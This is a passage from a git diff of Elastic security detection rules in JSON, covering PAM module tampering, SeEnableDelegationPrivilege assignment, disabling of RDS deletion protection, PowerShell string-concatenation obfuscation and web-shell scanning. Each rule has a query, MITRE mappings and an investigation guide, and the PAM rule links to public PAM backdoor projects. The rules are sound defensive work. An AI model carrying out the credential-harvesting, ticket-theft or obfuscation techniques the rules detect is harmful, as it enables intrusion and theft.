false, + "name": "Esql.contains_shell_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_sus_cli_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_suspicious_path_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.host_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http.response.status_code_values", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_path_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_path_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.user_agent_original_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "f3ac6734-7e52-4a0d-90b7-6847bf4308f2", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Credential Access", + "Tactic: Command and Control", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 2 + }, + "id": "f3ac6734-7e52-4a0d-90b7-6847bf4308f2_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f48ecc44-7d02-437d-9562-b838d2c41987_7.json b/packages/security_detection_engine/kibana/security_rule/f48ecc44-7d02-437d-9562-b838d2c41987_7.json new file mode 100644 index 00000000000..461c270fd3a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f48ecc44-7d02-437d-9562-b838d2c41987_7.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the creation or modification of Pluggable Authentication Module (PAM) shared object files or configuration files. Attackers may create or modify these files to maintain persistence on a compromised system, or harvest account credentials.", + "false_positives": [ + "Trusted system module updates or allowed Pluggable Authentication Module (PAM) daemon configuration changes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.file*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of Pluggable Authentication Module or Configuration", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Creation or Modification of Pluggable Authentication Module or Configuration\n\nPluggable Authentication Modules (PAM) are integral to Linux systems, managing authentication tasks. Adversaries may exploit PAM by creating or altering its modules or configurations to gain persistence or capture credentials. The detection rule identifies suspicious activities by monitoring file operations in PAM directories, excluding legitimate processes, thus highlighting potential unauthorized modifications.\n\n### Possible investigation steps\n\n- Review the file path and extension to determine if the modified or created file is a PAM shared object or configuration file, focusing on paths like \"/lib/security/*\", \"/etc/pam.d/*\", and \"/etc/security/pam_*\".\n- Identify the process executable responsible for the file operation and verify if it is listed as an excluded legitimate process, such as \"/bin/dpkg\" or \"/usr/bin/yum\". If not, investigate the process further.\n- Check the process execution history and command line arguments to understand the context of the file operation and assess if it aligns with typical system administration tasks.\n- Investigate the user account associated with the process to determine if it has legitimate access and permissions to modify PAM files, and check for any signs of compromise or misuse.\n- Examine recent system logs and security alerts for any related suspicious activities or anomalies that might indicate a broader attack or compromise.\n- If the file operation is deemed suspicious, consider restoring the original PAM configuration from a known good backup and monitor the system for any further unauthorized changes.\n\n### False positive analysis\n\n- Package management operations: Legitimate package managers like dpkg, rpm, and yum may trigger the rule during software updates or installations. To handle this, exclude these processes by adding them to the exception list in the rule configuration.\n- System updates and maintenance: Processes such as pam-auth-update and systemd may modify PAM configurations during routine system updates. Exclude these processes to prevent false positives.\n- Temporary files: Files with extensions like swp, swpx, and swx are often temporary and not indicative of malicious activity. Exclude these extensions to reduce noise.\n- Development environments: Paths like /nix/store/* and /snap/* may be used in development or containerized environments. Consider excluding these paths if they are part of a known and secure setup.\n- Automated scripts: Scripts using tools like sed or perl may create temporary files that match the rule's criteria. Exclude these specific patterns if they are part of regular, non-malicious operations.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Review the specific PAM module or configuration file that was created or modified to understand the changes made and assess the potential impact on system security.\n- Restore the affected PAM files from a known good backup to ensure the integrity of the authentication process and remove any malicious modifications.\n- Conduct a thorough scan of the system using updated antivirus and anti-malware tools to identify and remove any additional malicious software that may have been introduced.\n- Monitor the system and network for any signs of continued unauthorized access or suspicious activity, focusing on the indicators of compromise related to PAM manipulation.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if other systems may be affected.\n- Implement additional monitoring and alerting for PAM-related activities to enhance detection capabilities and prevent similar threats in the future.", + "query": "file where host.os.type == \"linux\" and event.action in (\"rename\", \"creation\") and\nprocess.executable != null and (\n (file.path like (\n \"/lib/security/*\", \"/lib64/security/*\", \"/usr/lib/security/*\", \"/usr/lib64/security/*\",\n \"/lib/x86_64-linux-gnu/security/*\", \"/usr/lib/x86_64-linux-gnu/security/*\"\n ) and file.extension == \"so\") or\n (file.path like \"/etc/pam.d/*\" and file.extension == null) or\n (file.path like \"/etc/security/pam_*\" or file.path == \"/etc/pam.conf\")\n) and not (\n process.executable in (\n \"/bin/dpkg\", \"/usr/bin/dpkg\", \"/bin/dockerd\", \"/usr/bin/dockerd\", \"/usr/sbin/dockerd\", \"/bin/microdnf\",\n \"/usr/bin/microdnf\", \"/bin/rpm\", \"/usr/bin/rpm\", \"/bin/snapd\", \"/usr/bin/snapd\", \"/bin/yum\", \"/usr/bin/yum\",\n \"/bin/dnf\", \"/usr/bin/dnf\", \"/bin/podman\", \"/usr/bin/podman\", \"/bin/dnf-automatic\", \"/usr/bin/dnf-automatic\",\n \"/bin/pacman\", \"/usr/bin/pacman\", \"/usr/bin/dpkg-divert\", \"/bin/dpkg-divert\", \"/sbin/apk\", \"/usr/sbin/apk\",\n \"/usr/local/sbin/apk\", \"/usr/bin/apt\", \"/usr/sbin/pacman\", \"/bin/podman\", \"/usr/bin/podman\", \"/usr/bin/puppet\",\n \"/bin/puppet\", \"/opt/puppetlabs/puppet/bin/puppet\", \"/usr/bin/chef-client\", \"/bin/chef-client\",\n \"/bin/autossl_check\", \"/usr/bin/autossl_check\", \"/proc/self/exe\", \"/dev/fd/*\", \"/usr/bin/pamac-daemon\",\n \"/bin/pamac-daemon\", \"/usr/lib/snapd/snapd\", \"/usr/local/bin/dockerd\", \"/usr/sbin/pam-auth-update\",\n \"/usr/lib/systemd/systemd\", \"/usr/libexec/packagekitd\", \"/usr/bin/bsdtar\", \"/sbin/pam-auth-update\", \"./user/bin/podman\",\n \"/usr/bin/dnf5\", \"/opt/puppetlabs/puppet/bin/ruby\", \"/usr/bin/crio\", \"/sbin/authconfig\", \"/usr/sbin/yum-cron\",\n \"/sbin/yum-cron\", \"/usr/local/psa/bin/dnf_install\", \"/opt/jc/bin/jumpcloud-agent\"\n\n ) or\n file.path like (\n \"/tmp/snap.rootfs_*/pam_*.so\", \"/tmp/newroot/lib/*/pam_*.so\", \"/tmp/newroot/usr/lib64/security/pam_*.so\"\n ) or\n file.extension in (\"swp\", \"swpx\", \"swx\", \"dpkg-remove\") or\n file.Ext.original.extension == \"dpkg-new\" or\n process.executable like (\n \"/nix/store/*\", \"/var/lib/dpkg/*\", \"/snap/*\", \"/dev/fd/*\", \"/usr/lib/virtualbox/*\", \"/usr/bin/python*\",\n \"/opt/alt/python*/bin/python*\", \"/usr/libexec/platform-python*\", \"./snap/snapd/*/usr/lib/snapd/snap-update-ns\"\n ) or\n (process.name == \"sed\" and file.name like~ \"sed*\") or\n (process.name == \"perl\" and file.name like~ \"e2scrub_all.tmp*\") or\n (process.name == \"perl\" and event.action == \"rename\" and file.Ext.original.name like \"*.pam-new\")\n)\n", + "references": [ + "https://github.com/zephrax/linux-pam-backdoor", + "https://github.com/eurialo/pambd", + "http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html", + "https://www.trendmicro.com/en_us/research/19/i/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.original.extension", + "type": "unknown" + }, + { + "ecs": false, + "name": "file.Ext.original.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f48ecc44-7d02-437d-9562-b838d2c41987", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "f48ecc44-7d02-437d-9562-b838d2c41987_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_215.json b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_215.json deleted file mode 100644 index 2bca4f2fda8..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_215.json +++ /dev/null @@ -1,100 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the assignment of the SeEnableDelegationPrivilege sensitive \"user right\" to a user. The SeEnableDelegationPrivilege \"user right\" enables computer and user accounts to be trusted for delegation. Attackers can abuse this right to compromise Active Directory accounts and elevate their privileges.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-system.security*", - "logs-windows.forwarded*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Sensitive Privilege SeEnableDelegationPrivilege assigned to a User", - "note": "## Triage and analysis\n\n### Investigating Sensitive Privilege SeEnableDelegationPrivilege assigned to a User\n\nKerberos delegation is an Active Directory feature that allows user and computer accounts to impersonate other accounts, act on their behalf, and use their privileges. Delegation (constrained and unconstrained) can be configured for user and computer objects.\n\nEnabling unconstrained delegation for a computer causes the computer to store the ticket-granting ticket (TGT) in memory at any time an account connects to the computer, so it can be used by the computer for impersonation when needed. Risk is heightened if an attacker compromises computers with unconstrained delegation enabled, as they could extract TGTs from memory and then replay them to move laterally on the domain. If the attacker coerces a privileged user to connect to the server, or if the user does so routinely, the account will be compromised and the attacker will be able to pass-the-ticket to privileged assets.\n\nSeEnableDelegationPrivilege is a user right that is controlled within the Local Security Policy of a domain controller and is managed through Group Policy. This setting is named **Enable computer and user accounts to be trusted for delegation**.\n\nIt is critical to control the assignment of this privilege. A user with this privilege and write access to a computer can control delegation settings, perform the attacks described above, and harvest TGTs from any user that connects to the system.\n\n#### Possible investigation steps\n\n- Investigate how the privilege was assigned to the user and who assigned it.\n- Investigate other potentially malicious activity that was performed by the user that assigned the privileges using the `user.id` and `winlog.activity_id` fields as a filter during the past 48 hours.\n- Investigate other alerts associated with the users/host during the past 48 hours.\n\n### False positive analysis\n\n- The SeEnableDelegationPrivilege privilege should not be assigned to users. If this rule is triggered in your environment legitimately, the security team should notify the administrators about the risks of using it.\n\n### Related rules\n\n- KRBTGT Delegation Backdoor - e052c845-48d0-4f46-8a13-7d0aba05df82\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Remove the privilege from the account.\n- Review the privileges of the administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "event.code:4704 and winlog.event_data.PrivilegeList:\"SeEnableDelegationPrivilege\"\n", - "references": [ - "https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", - "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_alert_active_directory_user_control.yml", - "https://twitter.com/_nwodtuhs/status/1454049485080907776", - "https://www.thehacker.recipes/ad/movement/kerberos/delegations", - "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0105_windows_audit_authorization_policy_change.md" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.PrivilegeList", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d", - "setup": "## Setup\n\nThe 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1558", - "name": "Steal or Forge Kerberos Tickets", - "reference": "https://attack.mitre.org/techniques/T1558/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 215 - }, - "id": "f494c678-3c33-43aa-b169-bb3d5198c41d_215", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f541ca3a-5752-11f0-b44b-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/f541ca3a-5752-11f0-b44b-f661ea17fbcd_1.json index 33015365812..f11f6839147 100644 --- a/packages/security_detection_engine/kibana/security_rule/f541ca3a-5752-11f0-b44b-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f541ca3a-5752-11f0-b44b-f661ea17fbcd_1.json @@ -30,7 +30,7 @@ }, { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/f6652fb5-cd8e-499c-8311-2ce2bb6cac62_6.json b/packages/security_detection_engine/kibana/security_rule/f6652fb5-cd8e-499c-8311-2ce2bb6cac62_6.json new file mode 100644 index 00000000000..41153c1e186 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f6652fb5-cd8e-499c-8311-2ce2bb6cac62_6.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of an AWS RDS DB instance or cluster to disable the deletionProtection feature. Deletion protection prevents accidental or unauthorized deletion of RDS resources. Adversaries with sufficient permissions may disable this protection as a precursor to destructive actions, including the deletion of databases containing sensitive or business-critical data. This rule alerts when deletionProtection is explicitly set to false on an RDS DB instance or cluster.", + "false_positives": [ + "The deletionProtection feature must be disabled as a prerequisite for deletion of a DB instance or cluster. Ensure that the instance should not be modified in this way before taking action." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "target.entity.id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS RDS DB Instance or Cluster Deletion Protection Disabled", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. \n> While every effort has been made to ensure its quality, validate and adapt it to suit your operational needs.\n\n### Investigating AWS RDS DB Instance or Cluster Deletion Protection Disabled\n \nDeletion protection is designed to safeguard RDS DB instances and clusters from accidental or unauthorized deletion. An adversary with privileged access in a compromised environment, can disable this safeguard before issuing a `DeleteDBInstance` or `DeleteDBCluster` action. This rule detects successful attempts to modify deletionProtection and set it to false on any RDS instance or cluster.\n\n#### Possible investigation steps\n\n- **Identify the Actor**\n - Review `aws.cloudtrail.user_identity.arn`, `aws.cloudtrail.user_identity.type`, and `access_key_id` to determine which IAM principal made the change.\n - Validate whether this principal normally performs RDS lifecycle operations.\n\n- **Review Event Details**\n - Inspect `aws.cloudtrail.request_parameters` or `target.entity.id` to confirm the targeted DB instance or cluster identifier.\n - Confirm that the request explicitly contains `deletionProtection=false`.\n\n- **Contextualize the Change**\n - Determine if recent activities justify the removal of deletion protection (migration, decommissioning, or maintenance).\n - Compare the timestamp to normal operational hours or deployment windows.\n\n- **Correlate with Additional Activity**\n - Look for subsequent or preceding RDS actions such as:\n - `DeleteDBInstance`\n - `DeleteDBCluster`\n - Security group modifications\n - Changes to parameter groups or backup retention policies.\n - Sudden removal of backups or snapshots may indicate imminent destructive activity.\n\n- **Verify Environmental Risk**\n - Assess the sensitivity of data stored in the affected DB instance or cluster.\n - Determine if the instance is production, customer-facing, or mission-critical.\n\n- **Interview Relevant Personnel**\n - Confirm with service owners or DB administrators whether the modification was intended and approved.\n\n### False positive analysis\n\n- **Expected Decommissioning**\n - Instances undergoing teardown or migration legitimately require deletion protection to be disabled first.\n\n- **Inconsistent Historical Behavior**\n - Compare the action to historical modification patterns for the user or role. If the action aligns with past legitimate changes, it may not be suspicious.\n\n### Response and remediation\n\n- **Immediate Remediation**\n - If unauthorized, re-enable deletion protection (`deletionProtection=true`) on the affected DB instance or cluster.\n - Review security groups, backup retention, and snapshot policies for additional unauthorized changes.\n\n- **Access Review**\n - Investigate credential exposure for the IAM principal that performed the action.\n - Rotate access keys or temporarily revoke permissions if compromise is suspected.\n\n- **Containment**\n - If destructive intent is suspected, apply guardrails (e.g., IAM condition keys, SCPs) to prevent DB deletion.\n\n- **Audit and Harden**\n - Ensure RDS instances adhere to least-privilege principles.\n - Restrict who can modify `ModifyDBInstance` or `ModifyDBCluster` destructive settings, such as deletion protection, backup retention, and public accessibility.\n\n- **Incident Response Activation**\n - Treat unauthorized removal of deletion protection as a high-risk precursor to data destruction.\n - Trigger IR processes for containment, root cause analysis, and post-incident hardening.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "any where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"rds.amazonaws.com\"\n and event.action in (\"ModifyDBInstance\", \"ModifyDBCluster\")\n and event.outcome == \"success\"\n and stringContains(aws.cloudtrail.request_parameters, \"deletionProtection=false\")\n", + "references": [ + "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBInstance.html", + "https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_DeleteInstance.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f6652fb5-cd8e-499c-8311-2ce2bb6cac62", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS RDS", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "f6652fb5-cd8e-499c-8311-2ce2bb6cac62_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f6d8c743-0916-4483-8333-3c6f107e0caa_6.json b/packages/security_detection_engine/kibana/security_rule/f6d8c743-0916-4483-8333-3c6f107e0caa_6.json new file mode 100644 index 00000000000..fd10657fa6d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f6d8c743-0916-4483-8333-3c6f107e0caa_6.json @@ -0,0 +1,173 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts that use string concatenation as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential PowerShell Obfuscation via String Concatenation", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via String Concatenation\n\nPowerShell is a powerful scripting language used for task automation and configuration management. Adversaries exploit its flexibility to obfuscate malicious scripts, often using string concatenation to evade detection. The detection rule identifies scripts with excessive concatenation patterns, flagging potential obfuscation by analyzing script length and pattern frequency, thus aiding in uncovering hidden threats.\n\n### Possible investigation steps\n\n- Review the powershell.file.script_block_text field to understand the content and purpose of the script, focusing on the sections identified by the string concatenation patterns.\n- Examine the file.path field to determine the location of the script on the host system, which can provide context about its origin and potential legitimacy.\n- Check the host.name and agent.id fields to identify the affected system and correlate with other security events or alerts from the same host for broader context.\n- Investigate the user.id field to determine which user executed the script, assessing their role and whether they have a legitimate reason to run such scripts.\n- Analyze the powershell.file.script_block_id and powershell.sequence fields to trace the execution flow and sequence of the script blocks, which may reveal additional obfuscation or malicious behavior.\n- Cross-reference the _id and _index fields with other logs or alerts to identify any related incidents or patterns of activity that might indicate a larger threat campaign.\n\n### False positive analysis\n\n- Scripts with legitimate string concatenation for logging or configuration purposes may trigger the rule. Review the script context to determine if the concatenation is part of a benign operation.\n- Automated scripts generated by development tools might use string concatenation extensively. Identify these tools and consider excluding their output directories or specific script patterns from the rule.\n- PowerShell scripts used in complex data processing tasks may naturally contain high levels of string concatenation. Analyze the script's purpose and, if deemed safe, add exceptions for specific script block IDs or paths.\n- Frequent administrative scripts that concatenate strings for dynamic command execution could be flagged. Verify the script's source and function, then whitelist known safe scripts by user ID or host name.\n- Consider adjusting the threshold for pattern detection if legitimate scripts frequently exceed the current limit, ensuring that the rule remains effective without generating excessive false positives.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further spread of potentially malicious scripts across the network. Disconnect it from the network and any shared resources.\n- Terminate any suspicious PowerShell processes identified by the alert to halt the execution of potentially obfuscated scripts.\n- Conduct a thorough examination of the script block text and associated files to identify and remove any malicious code or artifacts. Use a secure, isolated environment for analysis.\n- Restore the affected system from a known good backup if malicious activity is confirmed and cannot be easily remediated.\n- Update and run a full antivirus and antimalware scan on the affected system to ensure no additional threats are present.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are compromised.\n- Implement enhanced monitoring and logging for PowerShell activities across the network to detect similar obfuscation attempts in the future, ensuring that alerts are configured to notify the appropriate personnel promptly.\n", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"['\"][A-Za-z0-9.]+['\"](\\s?\\+\\s?['\"][A-Za-z0-9.,\\-\\s]+['\"]){2,}\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least twice\n| where Esql.script_block_pattern_count >= 2\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_length", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_pattern_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 